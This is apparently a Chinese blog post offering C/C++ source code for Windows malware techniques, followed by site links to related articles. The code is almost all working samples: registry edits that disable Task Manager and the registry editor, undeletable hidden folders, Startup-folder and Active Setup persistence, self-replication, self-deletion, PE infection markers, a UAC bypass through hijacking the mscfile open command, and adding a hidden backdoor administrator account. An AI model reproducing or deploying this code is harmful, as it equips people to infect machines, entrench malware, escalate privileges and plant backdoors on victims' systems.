针对注册表恶意修改:

#include <stdio.h>

#include <Windows.h>

// 禁用系统任务管理器

void RegTaskmanagerForbidden()

{

	HKEY hkey;

	DWORD value = 1;

	RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);

	RegSetValueEx(hkey, "DisableTaskMgr", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));

	RegCloseKey(hkey);

}

// 禁用注册表编辑器

void RegEditForbidden()

{

	HKEY hkey;

	DWORD value = 1;

	RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);

	RegSetValueEx(hkey, "DisableRegistryTools", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));

	RegCloseKey(hkey);

}

// 干掉桌面壁纸

void RegModifyBackroud()

{

	DWORD value = 1;

	HKEY hkey;

	RegCreateKey(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", &hkey);

	RegSetValueEx(hkey, "Wallpaper", NULL, REG_SZ, (unsigned char *)"c://", 3);

	RegSetValueEx(hkey, "WallpaperStyle", NULL, REG_DWORD, (LPBYTE)&value, sizeof(DWORD));

}

创建不可删除文件: 创建不可删除文件关键在于在子目录中创建一个\\anti...\\文件,该文件在系统中有特殊用途.

#include <stdio.h>

#include <shlobj.h>

#include <windows.h>

// 添加不可删除文件

BOOL SetImmunity(char *FilePath,char *FileName)

{

	char file[2048] = { 0 };

	strncpy(file, FilePath, strlen(FilePath));

	strcat(file, FileName);

	BOOL bRet = CreateDirectory(file, NULL);

	if (bRet)

	{

		// 创建无法删除的文件夹

		strcat(file, "\\anti...\\");

		bRet = CreateDirectory(file, NULL);

		if (bRet)

		{

			// 设置文件为隐藏属性

			SetFileAttributes(file, FILE_ATTRIBUTE_HIDDEN);

			return TRUE;

		}

	}

	return FALSE;

}

// 删除无法删除文件

void ClearImmunity(char *FilePath, char *FileName)

{

	char file[2048] = { 0 };

	strncpy(file, FilePath, strlen(FilePath));

	strcat(file, FileName);

	strcat(file, "\\anti...\\");

	RemoveDirectory(file);

	ZeroMemory(file, MAX_PATH);

	strncpy(file, FilePath, strlen(FilePath));

	strcat(file, FileName);

	RemoveDirectory(file);

}

int main(int argc, char * argv[])

{

	// 创建 autorun.inf 可免疫自动播放

	char *Fuck[4] = { "你", "好", "世", "界" };

	int FuckLen = sizeof(Fuck) / sizeof(int);

	TCHAR Destop[MAX_PATH];

	SHGetSpecialFolderPath(NULL, Destop, CSIDL_DESKTOP, FALSE);	 // 获取桌面绝对路径

	for (int x = 0; x < FuckLen; x++)

	{

		SetImmunity("c://", Fuck[x]);

		//ClearImmunity("c://", Fuck[x]);

	}

	system("pause");

	return 0;

}

通过快速启动项自启动:

#include <stdio.h>

#include <windows.h>

#include <Shlobj.h>

#pragma comment(lib, "shell32.lib")

BOOL AutoRun_Startup(char *lpszSrcFilePath, char *lpszDestFileName)

{

	char szStartupPath[MAX_PATH] = { 0 };

	char szDestFilePath[MAX_PATH] = { 0 };

	// 获取快速启动目录路径

	SHGetSpecialFolderPath(NULL, szStartupPath, CSIDL_STARTUP, TRUE);

	printf("快速启动路径: %s\n", szStartupPath);

	// 构造拷贝的目的文件路径

	wsprintf(szDestFilePath, "%s\\%s", szStartupPath, lpszDestFileName);

	// 拷贝文件到快速启动目录下

	CopyFile(lpszSrcFilePath, szDestFilePath, FALSE);

	return TRUE;

}

int main(int argc, char * argv[])

{

	AutoRun_Startup("c://main.exe", "main.exe");

	system("pause");

	return 0;

}

设置重启自删除:

#include <Windows.h>

BOOL RebootDelete(char *pszFileName)

{

	// 重启删除文件

	char szTemp[MAX_PATH] = "\\\\?\\";

	::lstrcat(szTemp, pszFileName);

	BOOL bRet = ::MoveFileEx(szTemp, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);

	return bRet;

}

int main(int argc, char * argv[])

{

	RebootDelete("C:\\shell.exe")

	system("pause");

	return 0;

}

实现病毒自我繁殖:

#include <stdio.h>

#include <Windows.h>

#include <shlobj.h>

#include <time.h>

void Reproduce()

{

	char name_str[100] = {};

	int name;

	srand((unsigned)time(NULL));   // 随机数种子

	name = rand() % 102408;

	_itoa(name, name_str, 22);	   // 将随机数转化成字符串

	TCHAR szpath[MAX_PATH];

	char target[100] = {};

	TCHAR Destop[MAX_PATH];

	GetModuleFileName(NULL, szpath, MAX_PATH);	                 // 获取当前执行程序的路径

	SHGetSpecialFolderPath(NULL, Destop, CSIDL_DESKTOP, FALSE);	 // 获取桌面绝对路径

	strcat(target, Destop);

	strcat(target, "\\");

	strcat(target, name_str);

	strcat(target, ".exe");

	CopyFile(szpath, target, FALSE);

}

int main(int argc, char* argv[])

{

	Reproduce();

	system("pause");

	return 0;

}

病毒的自删除手段:

#include <stdio.h>

#include <shlobj.h>

#include <windows.h>

BOOL SelfDel()

{

	SHELLEXECUTEINFO sei;

	TCHAR szModule[MAX_PATH], szComspec[MAX_PATH], szParams[MAX_PATH];

	if ((GetModuleFileName(0, szModule, MAX_PATH) != 0) &&

		(GetShortPathName(szModule, szModule, MAX_PATH) != 0) &&

		(GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) != 0))

	{

		lstrcpy(szParams, "/c del ");

		lstrcat(szParams, szModule);

		lstrcat(szParams, " > nul");

		// 设置结构成员.

		sei.cbSize = sizeof(sei);

		sei.hwnd = 0;

		sei.lpVerb = "Open";

		sei.lpFile = szComspec;

		sei.lpParameters = szParams;

		sei.lpDirectory = 0; sei.nShow = SW_HIDE;

		sei.fMask = SEE_MASK_NOCLOSEPROCESS;

		// 创建cmd进程.

		if (ShellExecuteEx(&sei))

		{

			// 设置cmd进程的执行级别为空闲执行,使本程序有足够的时间从内存中退出.

			SetPriorityClass(sei.hProcess, IDLE_PRIORITY_CLASS);

			// 将自身进程的优先级置高

			SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);

			SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);

			// 通知Windows资源浏览器,本程序文件已经被删除.

			SHChangeNotify(SHCNE_DELETE, SHCNF_PATH, szModule, 0);

			return TRUE;

		}

	}

	return FALSE;

}

int main(int argc, char* argv[])

{

	SelfDel();

	return 0;

}

设置文件感染标志: PE文件中有很多字段并没有使用到,我们可以在内部写入参数,实现检查是否被感染.

#include <stdio.h>

#include <stddef.h>

#include <windows.h>

#define VIRUSFLAGS 0xCCCC

// 向指定文件写入感染标志

BOOL WriteSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)

{

	DWORD dwNum = 0;

	SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);

	WriteFile(hFile, &dwSig, sizeof(DWORD), &dwNum, NULL);

	return TRUE;

}

// 检查文件是否被感染

BOOL CheckSig(DWORD dwAddr, DWORD dwSig, HANDLE hFile)

{

	DWORD dwSigNum = 0;

	DWORD dwNum = 0;

	SetFilePointer(hFile, dwAddr, 0, FILE_BEGIN);

	ReadFile(hFile, &dwSigNum, sizeof(DWORD), &dwNum, NULL);

	if (dwSigNum == dwSig)

		return TRUE;

	return FALSE;

}

int main(int argc, char* argv[])

{

	HANDLE hFile,hMap = NULL;

	LPVOID lpBase = NULL;

	hFile = CreateFile("c://1.exe",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);

	hMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,0,0);

	lpBase = MapViewOfFile(hMap,FILE_MAP_READ | FILE_MAP_WRITE,0,0,0);

	PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)lpBase;

	PIMAGE_NT_HEADERS pNtHeader = NULL;

	PIMAGE_SECTION_HEADER pSec = NULL;

	IMAGE_SECTION_HEADER imgSec = { 0 };

	if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE)

	{

		printf("文件非可执行文件 \n");

		return -1;

	}

	pNtHeader = (PIMAGE_NT_HEADERS)((BYTE*)lpBase + pDosHeader->e_lfanew);

	// 写入感染标志

	WriteSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile);

	// 返回真说明感染过

	if (CheckSig(offsetof(IMAGE_DOS_HEADER, e_cblp), VIRUSFLAGS, hFile))

	{

		printf("文件已被感染,无法重复感染. \n");

	}

	system("pause");

	return 0;

}

关闭UAC权限控制:

#include <Windows.h>

BOOL SetReg(char *lpszExePath)

{

	HKEY hKey = NULL;

	// 创建项

	::RegCreateKeyEx(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\Shell\\Open\\Command",

		0, NULL, 0, KEY_WOW64_64KEY | KEY_ALL_ACCESS, NULL, &hKey, NULL);

	if (NULL == hKey)

	{

		return FALSE;

	}

	::RegSetValueEx(hKey, NULL, 0, REG_SZ, (BYTE *)lpszExePath, (1 + ::lstrlen(lpszExePath)));

	::RegCloseKey(hKey);

	return TRUE;

}

int main(int argc,char *argv[])

{

	BOOL bRet = FALSE;

	PVOID OldValue = NULL;

	// 关闭文件重定位

	::Wow64DisableWow64FsRedirection(&OldValue);

	// 修改注册表

	bRet = SetReg("C:\\Windows\\System32\\cmd.exe");

	printf("已关闭 \n");

	// 恢复文件重定位

	::Wow64RevertWow64FsRedirection(OldValue);

	system("pause");

	return 0;

}

添加恶意后门账号:

#include <stdio.h>

#include <assert.h>

#include <windows.h>

#include <lm.h>

#pragma comment(lib,"netapi32")

// 添加系统用户

void AddUser(LPWSTR UserName, LPWSTR Password)

{

	USER_INFO_1 user;

	user.usri1_name = UserName;

	user.usri1_password = Password;

	user.usri1_priv = USER_PRIV_USER;

	user.usri1_home_dir = NULL;

	user.usri1_comment = NULL;

	user.usri1_flags = UF_SCRIPT;

	user.usri1_script_path = NULL;

	//添加名为lysharks的用户,密码为sswordQq123

	if (NetUserAdd(NULL, 1, (LPBYTE)&user, 0) == NERR_Success)

		printf("创建用户完成 \n");

	// 添加用户到administrators组

	LOCALGROUP_MEMBERS_INFO_3 account;

	account.lgrmi3_domainandname = user.usri1_name;

	if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)

		printf("添加到组完成 \n");

}

// 枚举系统用户

void EnumUser()

{

	LPUSER_INFO_0 pBuf = NULL;

	LPUSER_INFO_0 pTmpBuf;

	DWORD dwLevel = 0;

	DWORD dwPrefMaxLen = MAX_PREFERRED_LENGTH;

	DWORD dwEntriesRead = 0, dwTotalEntries = 0, dwResumeHandle = 0;

	DWORD i;

	NET_API_STATUS nStatus;

	LPTSTR pszServerName = NULL;

	do

	{

		nStatus = NetUserEnum((LPCWSTR)pszServerName, dwLevel, FILTER_NORMAL_ACCOUNT,

			(LPBYTE*)&pBuf, dwPrefMaxLen, &dwEntriesRead, &dwTotalEntries, &dwResumeHandle);

		if ((nStatus == NERR_Success) || (nStatus == ERROR_MORE_DATA))

		{

			if ((pTmpBuf = pBuf) != NULL)

			{

				for (i = 0; (i < dwEntriesRead); i++)

				{

					assert(pTmpBuf != NULL);

					if (pTmpBuf == NULL)

					{

						break;

					}

					wprintf(L"%s\n", pTmpBuf->usri0_name, pTmpBuf);

					pTmpBuf++;

				}

			}

		}

		if (pBuf != NULL)

		{

			NetApiBufferFree(pBuf);

			pBuf = NULL;

		}

	} while (nStatus == ERROR_MORE_DATA);

	NetApiBufferFree(pBuf);

}

int main(int argc, char *argv[])

{

	AddUser(L"lyshark", L"123123");

	EnumUser();

	system("pause");

	return 0;

}

ActiveX 实现自启动:

#include <stdio.h>

#include <windows.h> 

//修改或创建字符串类型的键值

void CreateStringReg(HKEY hRoot, LPCWSTR szSubkey, LPCWSTR ValueName, LPCWSTR Data)

{

	// 创建新的注册表键

	HKEY hKey;

	long lRet = RegCreateKeyEx(hRoot, szSubkey, 0, NULL,

		REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);

	if (ERROR_SUCCESS != lRet)

		return;

	//修改或创建注册表键值

	lRet = RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, wcslen(Data) * 2);

	if (ERROR_SUCCESS != lRet)

		return;

	// 释放注册表键句柄

	RegCloseKey(hKey);

}

// 创建开机自启动进程

// 计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components

// 注册一条类似{84B421CD-B018-2513-B0B1-5C76DEF70F20}的子建,然后子键中新建StubPath的值项

void CreateAutoRun()

{

	HKEY hKey;

	DWORD dwDpt = REG_OPENED_EXISTING_KEY;

	// 清理一下

	RegDeleteKey(HKEY_CURRENT_USER,

		L"Software\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}");

	// 打开注册表键值

	long lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,

		L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",

		REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, &hKey);

	if (lRet != ERROR_SUCCESS)

	{

		WCHAR SelfFile[MAX_PATH];

		WCHAR SystemPath[MAX_PATH + 20];

		//获取系统目录

		GetSystemDirectory(SystemPath, sizeof(SystemPath));

		//在系统目录与\\activexrun.exe连接

		wcscat_s(SystemPath, L"\\main.exe");

		//获取当前进程路径

		GetModuleFileName(NULL, SelfFile, MAX_PATH);

		// main.exe复制到C:\windows\system32目录下

		CopyFile(SelfFile, SystemPath, FALSE);

		//写注册表

		CreateStringReg(HKEY_LOCAL_MACHINE,

			L"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{84B421CD-B018-2513-B0B1-5C76DEF70F20}",

			L"StubPath", SystemPath);

	}

}

int main(int argc, char *argv[])

{

	CreateAutoRun();

	system("pause");

	return 0;

}

C/C++ 病毒破坏手法总结的更多相关文章

  1. 手动删除文件夹exe病毒并恢复原来文件夹

    转自手动删除文件夹exe病毒并恢复原来文件夹 经常使用U盘.MP3.MP4等移动硬盘的大家,有时是不是会发现,移动硬盘里有现了exe文件,原来本来有一个文件夹的名字是 音乐 ,但后来发现 音乐 这个文 ...

  2. Hacker(25)----病毒攻防之认识病毒

    Internet中,计算机病毒是威胁计算机安全的程序.对于计算机病毒,用户不仅需要掌握其基础知识,还要认识常见的病毒及简单病毒制作方法.无论病毒基础还是制作简单病毒,用户需要掌握防御病毒的有效措施和专 ...

  3. 一个简单的HTML病毒分析

    一直就想写这篇东西了,仅仅是上班时说要上班,不写.回家后又忙着玩游戏,丢一边去了.如今仅仅好不务正业的开写了.希望头儿不会知道我的blog.哈哈 在非常久之前就对HTML的病毒非常感兴趣了,非常好奇怎 ...

  4. Android敲诈者病毒“安卓性能激活”分析(2015年9月版)

    一.情况简介 前几天分析了论坛里的一个Android敲诈者病毒,感觉还是很有收获,后面有空多研究研究Android病毒.说句题外话, 根据前面分析的Android敲诈者病毒的隐藏手法,应该可以实现&q ...

  5. 给Source Insight做个外挂系列之二--将本地代码注入到Source Insight进程

    上一篇文章介绍了如何发现正在运行的“Source Insight”窗口,本篇将介绍“TabSiPlus”是如何进行代码注入的.Windows 9x以后的Windows操作系统都对进程空间进行了严格的保 ...

  6. 用DOS命令打开IE浏览器、我的文档等等

    用DOS命令打开IE浏览器 在“start”-运行中直接输入网址就可以了.如输入百度: http://www.baidu.com Command:[ start  http://www.baidu.c ...

  7. 销傲销售过程GSP管理系统功能概述

    1      公司介绍 西安海思威软件有限公司于2009年2月注册成立,海思威软件公司隶属于海思威集团,位于交通十分便利的西安经济技术开发区.公司致力于中国本土式销售管理的研究与管理软件产品的开发,是 ...

  8. Windows7下出现“不支持此接口”的解决方案

    今天学校里的辅导员突然找到我说Windows 7下什么文件夹都打不开了,提示“不支持此接口”.怀疑是病毒所致,但运行杀毒软件没有结果.重启也问题依旧. 上网查了之后找到了修复方法: 在命令行中输入fo ...

  9. 解决蓝屏代吗0x0000007B的几种常见办法

        解决蓝屏代吗0x0000007B的几种常见办法 0x0000007B 蓝屏代码的分析 ◆错误分析:Windows在启动过程中无法访问系统分区或启动卷. 网络上经过收集,主要有四种可能.第一是新 ...

  10. Computer assembly and maintenance

    转载请注明出处: 我所遇见的世界会更美好 第一章 计算机的基本构成和组装 1,内存的组成? (1)  RAM(随机存取存储器) (2)  ROM(只读存储器) (3)  Cache(高速缓存) 2,S ...

随机推荐

  1. Spring Boot 整合 Camunda 实现工作流

    工作流是我们开发企业应用几乎必备的一项功能,工作流引擎发展至今已经有非常多的产品.最近正好在接触Camunda,所以来做个简单的入门整合介绍.如果您也刚好在调研或者刚开始计划接入,希望本文对您有所帮助 ...

  2. Java 8 Stream原理解析

    说起 Java 8,我们知道 Java 8 大改动之一就是增加函数式编程,而 Stream API 便是函数编程的主角,Stream API 是一种流式的处理数据风格,也就是将要处理的数据当作流,在管 ...

  3. vue如何实现v-model

  4. loadrunner12的安装教程

    一.LR12安装包: 链接:https://pan.baidu.com/s/1UU304e-nP7qAL-fV8T39YQ 密码:jpln 二.LR12安装: 1.下载完成后点击解压

  5. 2024-01-20:用go语言,小扣在探索丛林的过程中,无意间发现了传说中“落寞的黄金之都“, 而在这片建筑废墟的地带中,小扣使用探测仪监测到了存在某种带有「祝福」效果的力场, 经过不断的勘测记录,

    2024-01-20:用go语言,小扣在探索丛林的过程中,无意间发现了传说中"落寞的黄金之都", 而在这片建筑废墟的地带中,小扣使用探测仪监测到了存在某种带有「祝福」效果的力场, ...

  6. JVM 内存模型及特点总结

    本文为博主原创,未经允许不得转载: JVM 内存区域主要分为线程私有区域[程序计数器.虚拟机栈.本地方法区].线程共享区域[JAVA 堆.方法区].直接内存. 线程私有数据区域生命周期与线程相同, 依 ...

  7. 如何安全的大数据量表在线进行DDL操作

    本文为博主原创,转载请注明出处 随着业务的需要,工作中需要对生产数据库的一些表做一些DDL操作,由于生产数据库表的数据量都是几千万, 而且生产数据库的表还在不断的进行新增和查询操作.应用中需要对生产数 ...

  8. 【RTOS】基于RTOS的降低功耗的策略

    RTOS中降低功耗的策略 Saving Power with an RTOS 介绍 随着绿色节能产品需求的增加,快速增长的移动设备,其电池寿命最受关注,设计者必须要考虑在其设计中如何最大限度的降低功耗 ...

  9. 2023第十四届极客大挑战 — CRYPTO(WP全)

    浅谈: 本次大挑战我们队伍也是取得了第一名的成绩,首先要感谢同伴的陪伴和帮助.在共同的努力下终不负期望! 但遗憾的是我们没有在某个方向全通关的,呜呜呜~ 继续努力吧!要学的还很多.明年有机会再战!!加 ...

  10. [转帖]使用 TiUP 扩容缩容 TiDB 集群

    https://docs.pingcap.com/zh/tidb/stable/scale-tidb-using-tiup TiDB 集群可以在不中断线上服务的情况下进行扩容和缩容. 本文介绍如何使用 ...